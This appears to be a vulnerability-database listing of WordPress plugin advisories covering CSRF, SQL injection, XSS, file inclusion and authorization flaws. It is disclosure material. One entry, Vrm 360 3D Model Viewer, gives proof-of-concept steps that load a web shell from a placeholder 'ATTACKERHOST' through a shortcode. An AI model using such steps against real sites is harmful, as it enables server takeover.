14602 matches found
WooCommerce < 7.0.1 - Authenticated(Shop Manager+) Sensitive Information Exposure
Description The WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.0. This can allow authenticated attackers with Shop Manager privileges or above to extract sensitive user metadata including session tokens...
Starter Templates <= 3.2.5 - Incorrect Authorization
Description The Starter Templates free and premium plugin for WordPress is vulnerable to unauthorized modification of data due to an incorrect capability check on the sseimport function in versions up to, and including, 3.2.5. This makes it possible for authenticated attackers, with...
Starter Templates <= 3.2.4 - Authenticated (Contributor+) Server-Side Request Forgery
Description The Starter Templates free and premium plugin for WordPress is vulnerable to Server-Side Request Forgery in versions up to, and including, 3.2.4 via the remoterequest. This can allow authenticated attackers, with contributor-level access and above, to make web requests to arbitrary...
ProfilePress < 4.13.2 Cross-Site Request Forgery via 'admin_notice'
Description The ProfilePress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 4.13.1. This is due to missing or incorrect nonce validation on the 'adminnotice' function. This makes it possible for unauthenticated attackers to dismiss admin notices...
Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE
Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. PoC 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...
Elementor Website Builder < 3.16.5 - Missing Authorization to Arbitrary Attachment Read
Description The Elementor Website Builder plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the getinlinesvg function in all versions up to, and including, 3.16.4. This makes it possible for authenticated attackers, with contributor-level acces...
iPanorama 360 – WordPress Virtual Tour Builder < 1.8.0 - Authenticated (Admin+) SQL injection
Description The iPanorama 360 plugin for WordPress is vulnerable to SQL Injection via the 'orderby' parameter in versions up to, and including, 1.7.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible fo...
Backup Migration < 1.3.0 - Cross-Site Request Forgery
Description The Backup Migration plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.9. This is due to missing nonce validation on the ajax function, or BMIAjax class. This makes it possible for unauthenticated attackers to control any of the...
Legal Pages < 1.3.8 - Missing Authorization on 'deleteLegalTemplate'
Description The Legal Pages plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the deleteLegalTemplate function in versions up to, and including, 1.3.7. This makes it possible for authenticated attackers, with subscriber-level access and...
Site Reviews < 6.10.3 - Missing Authorization
Description The Site Reviews plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'assignPost' and 'unassignPost' functions in versions up to, and including, 6.10.2. This makes it possible for authenticated attackers to assign and unassi...
ProfilePress < 4.13.2 - Limited Privilege Escalation via 'acceptable_defined_roles'
Description The ProfilePress plugin for WordPress is vulnerable to limited privilege escalation in versions up to, and including, 4.13.1 via the 'acceptabledefinedroles' function due to incomplete validation on a user controlled key. This can allow unauthenticated attackers to elevate their...
Quiz And Survey Master < 8.1.16 - Cross-Site Request Forgery via 'display_results'
Description The Quiz And Survey Master plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 8.1.15. This is due to missing or incorrect nonce validation on the 'displayresults' function. This makes it possible for unauthenticated attackers to submit...
Quiz And Survey Master < 8.1.14 - Authenticated (Contributor+) Stored Cross-Site Scripting
Description The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 8.1.13 due to insufficient input sanitization and output escaping on user...
wpDiscuz < 7.6.12 - Cross-Site Request Forgery
Description The wpDiscuz plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 7.6.11. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to dismiss admin notices via a...
WP Meta and Date Remover < 2.3.1 - Cross-Site Request Forgery via updateSettings
Description The WP Meta and Date Remover plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.3.0. This is due to missing or incorrect nonce validation on the updateSettings function. This makes it possible for unauthenticated attackers to chang...
WooCommerce Subscription < 4.6.0 - Cross-Site Request Forgery
Description The WooCommerce Subscription for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and not including, 4.6.0. This is due to missing or incorrect nonce validation when suspending or canceling subscriptions. This makes it possible for unauthenticated attackers to...
Give - Donation Plugin < 2.33.1 - Authenticated(Give Manager+) Privilege Escalation
Description The Give - Donation Plugin plugin for WordPress is vulnerable to privilege escalation due to an insufficient capability check when updating default roles in versions up to, and including, 2.33.0. This makes it possible for authenticated attackers with Give Manager privileges to elevat...
Astra Bulk Edit < 1.2.8 - Missing Authorization
Description The Astra Bulk Edit plugin for WordPress is vulnerable to unauthorized missing authorization due to a missing capability check on the savepostbulkedit function in versions up to, and including, 1.2.7. This makes it possible for attackers with contributor-level access or higher to bulk...
WPvivid Backup Plugin < 0.9.91 - Missing Authorization via 'start_staging' and 'get_staging_progress'
Description The WPvivid Backup Plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the 'startstaging' and 'getstagingprogress' functions in versions up to, and including, 0.9.90. This makes it possible for authenticated...
EWWW Image Optimizer < 7.2.1 - Sensitive Information Exposure
Description The EWWW Image Optimizer for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.2.0 due to the plugin saving debug logs in predictable locations. This can allow unauthenticated attackers to obtain information about installation paths, file...
Customer Reviews for WooCommerce < 5.36.1 - Missing Authorization in Reviews Exporter
Description The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a missing capability check on the checkprogress and cancelexport functions in versions up to, and including, 5.36.0. This makes it possible for...
Contact Form for Plugin by Fluent Forms < 5.0.9 - Insecure Direct Object Reference
Description The Contact Form for Plugin by Fluent Forms plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 5.0.8 via the addIsRenderableFilter function due to missing validation on the publication status of a form. This makes it possible for...
Phlox Portfolio < 2.3.2 - Unauthenticated Local File Inclusion
Description The Phlox Portfolio plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3.1. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files...
kk Star Ratings < 5.4.6 - Missing Authorization
Description The kk Star Ratings plugin for WordPress is vulnerable to unauthorized use of functionality due to a missing capability check on an unknown function in versions up to, and including, 5.4.5. This makes it possible for unauthenticated attackers to make use of this functionality. The exa...
Unyson <= 2.7.28 - Missing Authorization
Description The Unyson plugin for WordPress is vulnerable to unauthorized access and modification of data due to missing capability checks on several functions in versions up to, and including, 2.7.28. This makes it possible for authenticated attackers, with subscriber-level access and above, to...
VK Blocks < 1.64.0.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Block
Description The VK Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk-blocks/ancestor-page-list' block in all versions up to, and including, 1.63.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...
Jetpack < 12.7 - Authenticated(Contributor+) Clickjacking via Iframe Injection
Description The Jetpack – WP Security, Backup, Speed, & Growth plugin for WordPress is vulnerable to Clickjacking via iframe injection due to an unknown parameter in all versions up to and including 12.6.2 due to insufficient input sanitization and output escaping. This makes it possible for...
EWWW Image Optimizer < 7.2.1 - Unauthenticated Sensitive Information Exposure via Debug Log
Description The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debuglog function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled...
Jetpack < 12.7 - Improper Authorization via WPCom External Media REST endpoints
Description The Jetpack plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the WPCom External Media REST permissioncallback function in versions up to and including 12.6.2. This makes it possible for authenticated attackers, with...
Carousel Slider < 2.2.3 - Missing Authorization
Description The Carousel Slider plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the handleoptinoptout function hooked via 'admininit' in versions up to, and including, 2.2.2. This makes it possible for unauthenticated attackers to opt i...
Super Socializer < 7.13.55 - Missing Authorization
Description The Super Socializer plugin for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions such as heateorsstwitcountnotificationread, heateorssgdprnotificationread, heateorssfbredirectionnotificationread,...
iThemes Sync < 2.1.14 - Cross-Site Request Forgery and Missing Authorization via 'hide_authenticate_notice'
Description The iThemes Sync plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.13. This is due to missing or incorrect nonce validation on the hideauthenticatenotice function. This makes it possible for unauthenticated attackers to hide admin...
WP Maintenance < 6.1.4 - IP Restriction Bypass
Description The WP Maintenance plugin for WordPress is vulnerable to IP Address Restriction Bypass in versions up to, and including, 6.1.3. This can be used to bypass settings that may have blocked out an IP address from accessing a page on the site...
Essential Blocks <= 4.2.0 - Unauthenticated PHP Object Injection via queries
Description The Essential Blocks plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 4.2.0 via deserialization of untrusted input in the getposts function. This allows unauthenticated attackers to inject a PHP Object. No POP chain is present in the...
Simple Membership < 4.3.5 - Account Takeover via Password Reset
Description The Simple Membership plugin for WordPress is vulnerable to account takeover due to missing input validation on the processpasswordresetusinglink function in versions up to, and including, 4.3.4. This makes it possible for authenticated attackers to gain access to arbitrary accounts o...
Pre-Publish Checklist < 1.1.2 - Insecure Direct Object Reference to Arbitrary Post '_ppc_meta_key' Update
Description The Pre-Publish Checklist plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.1.1 via the ppcmetaboxajaxaddhandler and ppcmetaboxajaxdeletehandler functions due to missing validation on a user controlled key. This can allow...
Quick Call Button <= 1.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Description The Quick Call Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-lev...
Nexter < 2.0.4 - Missing Authorization
Description The Nexter theme for WordPress is vulnerable to unauthorized modification of data due to missing capability checks on several functions such as nexterextraextactiveajax, nexterextraextdeactivateajax, nexterextwpreplaceurlsettingsajax, nexterextwpduplicatepostsettingsajax,...
Integrate Google Drive < 1.3.3 - Open Redirect via state
Description The plugin does not validate the state parameter before redirecting the user to its value, leading to an Open Redirect issue...
Events Rich Snippets for Google <= 1.8 - Cross-Site Request Forgery to Arbitrary Options Update
Description The Events Rich Snippets for Google plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.8. This is due to missing or incorrect nonce validation on the handleEventSettings function. This makes it possible for unauthenticated attackers to...
Funnelforms Free < 3.4.2 - Missing Authorization to New Category Creation
Description The Funnelforms Free plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the fnsfaddcategory function in versions up to, and including, 3.4. This makes it possible for authenticated attackers, with subscriber-level permissions a...
Superb slideshow gallery < 13.2 - Authenticated (Subscriber+) SQL Injection via Shortcode
Description The Superb slideshow gallery plugin for WordPress is vulnerable to SQL Injection via the plugin's shortcode in versions up to, and including, 13.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it...
Export WP Page to Static HTML/CSS < 2.2.0 - Cross-Site Request Forgery via Multiple AJAX Actions
Description The Export WP Page to Static HTML/CSS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.1.9. This is due to missing or incorrect nonce validation on multiple AJAX actions. This makes it possible for unauthenticated attackers to perfor...
Sponsors <= 3.5.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Description The Sponsors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sponsors' shortcode in all versions up to, and including, 3.5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for...
Theme Switcha < 3.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Description The Theme Switcha plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'themeswitchalist' shortcode in all versions up to, and including, 3.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible fo...
VK Filter Search < 2.3.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Description The VK Filter Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vkfiltersearch' shortcode in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible...
WCP OpenWeather <= 2.5.0 - Cross-Site Request Forgery
Description The WCP OpenWeather plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.0. This is due to missing or incorrect nonce validation on an unknown function. This makes it possible for unauthenticated attackers to perform an unknown...
WP Affiliate Disclosure < 1.2.7 - Cross-Site Request Forgery via check_capability
Description The WP Affiliate Disclosure plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.6. This is due to incorrect nonce validation logic on the checkcapability function. This makes it possible for unauthenticated attackers to update...
LWS Hide Login < 2.1.9 - Protection Mechanism Bypass
Description The LWS Hide Login plugin for WordPress is vulnerable to protection mechanism bypass in all versions up to, and including, 2.1.8. This is due to the fact that attackers can bypass the hidden login page by visiting install.php. This makes it possible for unauthenticated attackers to...
Live Gold Price & Silver Price Charts Widgets <= 2.4 - Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Description The Live Gold Price & Silver Price Charts Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated...